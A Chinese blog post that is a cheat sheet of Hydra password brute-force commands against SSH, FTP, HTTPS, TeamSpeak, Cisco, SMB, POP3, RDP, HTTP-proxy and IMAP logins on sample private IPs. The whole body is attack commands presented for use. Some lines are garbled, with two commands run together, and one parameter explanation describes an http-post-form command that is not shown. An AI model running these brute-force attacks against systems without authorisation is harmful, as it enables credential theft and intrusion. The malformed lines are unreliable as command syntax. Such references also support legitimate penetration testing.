zoukankan      html  css  js  c++  java
  • Hydra常用命令

    知道用户名或密码用小写,不知道用大写加字典

    破解ssh:

    hydra -l root -P passwd.txt -t 10 -vV -e ns 192.168.190.136 ssh


    hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

    破解ftp:

    hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV


    hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

    (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中的内容是表示错误猜解的返回信息提示。)

    破解https:

    hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https


    破解teamspeak

     

    hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak


    破解cisco:

    hydra -P pass.txt 10.36.16.18 ciscohydra -m cloud -P pass.txt 10.36.16.18 cisco-enable


    破解smb:

    hydra -l administrator -P pass.txt 10.36.16.18 smb


    破解pop3:

    hydra -l muts -P pass.txt my.pop3.mail pop3

    破解rdp:

    hydra ip rdp -l administrator -P pass.txt -V


    破解http-proxy:

    hydra -l admin -P pass.txt http-proxy://10.36.16.1


    破解imap:

    hydra -L user.txt -p secret 10.36.16.18 imap PLAINhydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

  • 相关阅读:
    Java类加载器总结
    Java程序编译和运行的过程
    Spring+Struts2+Hibernate整合
    Spring+MyBatis+SpringMVC整合
    声明式事务管理
    Scala sbt 添加国内镜像
    持续天数算法
    idea run shell set user name
    java insert mysql 中文乱码
    Samba服务器 安装
  • 原文地址:https://www.cnblogs.com/xyz315/p/13072731.html
Copyright © 2011-2022 走看看